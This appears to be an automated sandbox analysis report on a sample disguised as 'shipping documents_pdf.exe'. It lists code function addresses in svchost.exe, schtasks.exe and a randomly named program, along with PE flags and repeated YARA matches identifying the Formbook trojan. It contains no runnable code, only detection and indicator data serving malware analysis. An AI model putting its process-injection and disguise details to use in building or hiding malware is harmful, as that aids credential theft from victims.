Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00A6FBEF NtResumeThread,	4_2_00A6FBEF

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004183A3	1_2_004183A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004030A5	1_2_004030A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004030B0	1_2_004030B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042E963	1_2_0042E963
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040216E	1_2_0040216E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402170	1_2_00402170
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401290	1_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402310	1_2_00402310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402BC0	1_2_00402BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FBF3	1_2_0040FBF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402BBC	1_2_00402BBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416583	1_2_00416583
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402660	1_2_00402660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FE13	1_2_0040FE13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040DE93	1_2_0040DE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5D2F0	1_2_02F5D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE12ED	1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5B2C0	1_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC02C0	1_2_02FC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F452A0	1_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030003E6	1_2_030003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4E3F0	1_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F8739A	1_2_02F8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFA352	1_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2D34C	1_2_02F2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF132D	1_2_02FF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF70E9	1_2_02FF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFF0E0	1_2_02FFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEF0CC	1_2_02FEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300B16B	1_2_0300B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030001AA	1_2_030001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF81CC	1_2_02FF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4B1B0	1_2_02F4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F7516C	1_2_02F7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC8158	1_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FDA118	1_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F30100	1_2_02F30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5C6E0	1_2_02F5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF16CC	1_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3C7C0	1_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFF7B0	1_2_02FFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F64750	1_2_02F64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEE4F6	1_2_02FEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03000591	1_2_03000591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F31460	1_2_02F31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF2446	1_2_02FF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFF43F	1_2_02FFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FDD5B0	1_2_02FDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF7571	1_2_02FF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40535	1_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEDAC6	1_2_02FEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FDDAAC	1_2_02FDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F85AA0	1_2_02F85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3EA80	1_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB3A6C	1_2_02FB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFFA49	1_2_02FFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF7A46	1_2_02FF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB5BF0	1_2_02FB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F7DBF9	1_2_02F7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF6BD7	1_2_02FF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5FB80	1_2_02F5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFFB76	1_2_02FFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFAB40	1_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6E8F0	1_2_02F6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F438E0	1_2_02F438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F268B8	1_2_02F268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300A9A6	1_2_0300A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F42840	1_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4A840	1_2_02F4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAD800	1_2_02FAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F429A0	1_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F56962	1_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F49950	1_2_02F49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5B950	1_2_02F5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFEEDB	1_2_02FFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F49EB0	1_2_02F49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F52E90	1_2_02F52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFCE93	1_2_02FFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40E59	1_2_02F40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFEE26	1_2_02FFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F32FC8	1_2_02F32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFFFB1	1_2_02FFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FBEFA0	1_2_02FBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41F92	1_2_02F41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB4F40	1_2_02FB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F60F30	1_2_02F60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F82F28	1_2_02F82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFFF09	1_2_02FFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F30CF2	1_2_02F30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFFCF2	1_2_02FFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0CB5	1_2_02FE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB9C32	1_2_02FB9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40C00	1_2_02F40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3ADE0	1_2_02F3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5FDC0	1_2_02F5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F58DBF	1_2_02F58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF7D73	1_2_02FF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF1D5A	1_2_02FF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F43D40	1_2_02F43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4AD00	1_2_02F4AD00
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A3128A	2_2_02A3128A
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A3325A	2_2_02A3325A
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A3303A	2_2_02A3303A
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A399CA	2_2_02A399CA
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 2_2_02A51DAA	2_2_02A51DAA
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D5B2C0	4_2_02D5B2C0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D5D2F0	4_2_02D5D2F0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DE12ED	4_2_02DE12ED
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D452A0	4_2_02D452A0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DE0274	4_2_02DE0274
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02E003E6	4_2_02E003E6
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D4E3F0	4_2_02D4E3F0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D8739A	4_2_02D8739A
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFA352	4_2_02DFA352
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D2D34C	4_2_02D2D34C
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DF132D	4_2_02DF132D
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DEF0CC	4_2_02DEF0CC
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D470C0	4_2_02D470C0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DF70E9	4_2_02DF70E9
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFF0E0	4_2_02DFF0E0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DF81CC	4_2_02DF81CC
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02E001AA	4_2_02E001AA
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D4B1B0	4_2_02D4B1B0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02E0B16B	4_2_02E0B16B
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D2F172	4_2_02D2F172
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D7516C	4_2_02D7516C
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DDA118	4_2_02DDA118
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D30100	4_2_02D30100
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DF16CC	4_2_02DF16CC
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D5C6E0	4_2_02D5C6E0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D3C7C0	4_2_02D3C7C0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFF7B0	4_2_02DFF7B0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D64750	4_2_02D64750
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D40770	4_2_02D40770
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DEE4F6	4_2_02DEE4F6
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DF2446	4_2_02DF2446
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D31460	4_2_02D31460
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFF43F	4_2_02DFF43F
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DDD5B0	4_2_02DDD5B0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02E00591	4_2_02E00591
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DF7571	4_2_02DF7571
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D40535	4_2_02D40535
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DEDAC6	4_2_02DEDAC6
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D3EA80	4_2_02D3EA80
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DDDAAC	4_2_02DDDAAC
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D85AA0	4_2_02D85AA0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFFA49	4_2_02DFFA49
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DF7A46	4_2_02DF7A46
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DB3A6C	4_2_02DB3A6C
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DF6BD7	4_2_02DF6BD7
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D7DBF9	4_2_02D7DBF9
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D5FB80	4_2_02D5FB80
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFAB40	4_2_02DFAB40
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFFB76	4_2_02DFFB76
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D6E8F0	4_2_02D6E8F0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D438E0	4_2_02D438E0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D268B8	4_2_02D268B8
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D42840	4_2_02D42840
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D4A840	4_2_02D4A840
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DAD800	4_2_02DAD800
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02E0A9A6	4_2_02E0A9A6
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D429A0	4_2_02D429A0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D49950	4_2_02D49950
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D5B950	4_2_02D5B950
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D56962	4_2_02D56962
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFEEDB	4_2_02DFEEDB
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D52E90	4_2_02D52E90
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFCE93	4_2_02DFCE93
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D49EB0	4_2_02D49EB0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D40E59	4_2_02D40E59
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFEE26	4_2_02DFEE26
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D32FC8	4_2_02D32FC8
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D41F92	4_2_02D41F92
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFFFB1	4_2_02DFFFB1
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DB4F40	4_2_02DB4F40
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFFF09	4_2_02DFFF09
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D60F30	4_2_02D60F30
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D82F28	4_2_02D82F28
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D30CF2	4_2_02D30CF2
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DFFCF2	4_2_02DFFCF2
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DE0CB5	4_2_02DE0CB5
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D40C00	4_2_02D40C00
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DB9C32	4_2_02DB9C32
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D5FDC0	4_2_02D5FDC0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D3ADE0	4_2_02D3ADE0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D58DBF	4_2_02D58DBF
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DF1D5A	4_2_02DF1D5A
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D43D40	4_2_02D43D40
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02DF7D73	4_2_02DF7D73
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_02D4AD00	4_2_02D4AD00
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_004119C0	4_2_004119C0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00415070	4_2_00415070
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00413250	4_2_00413250
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_0042B630	4_2_0042B630
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_0040C8C0	4_2_0040C8C0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_0040CAE0	4_2_0040CAE0
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_0040AB60	4_2_0040AB60
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00A6E365	4_2_00A6E365
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00A6E484	4_2_00A6E484
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00A6D888	4_2_00A6D888
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: 4_2_00A6CB18	4_2_00A6CB18
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 7_2_04E204FF	7_2_04E204FF
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 7_2_04E28CAF	7_2_04E28CAF
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 7_2_04E255FF	7_2_04E255FF
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 7_2_04E26E8F	7_2_04E26E8F
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 7_2_04E1E79F	7_2_04E1E79F
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 7_2_04E2071F	7_2_04E2071F
Source: C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe	Code function: 7_2_04E3F26F	7_2_04E3F26F

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F87E54 appears 93 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02FAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02FBF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F75130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 02F2B970 appears 250 times
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: String function: 02D75130 appears 36 times
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: String function: 02DBF290 appears 103 times
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: String function: 02D2B970 appears 250 times
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: String function: 02D87E54 appears 86 times
Source: C:\Windows\SysWOW64\schtasks.exe	Code function: String function: 02DAEA12 appears 85 times

Source: shipping documents_pdf.exe, 00000000.00000003.1714978264.0000000004553000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs shipping documents_pdf.exe
Source: shipping documents_pdf.exe, 00000000.00000003.1714350173.00000000046FD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs shipping documents_pdf.exe
Source: shipping documents_pdf.exe, 00000000.00000003.1715101401.00000000046FD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs shipping documents_pdf.exe

Source: shipping documents_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1889137660.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1888596212.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3513291317.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3515959197.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3514584308.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3514539139.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

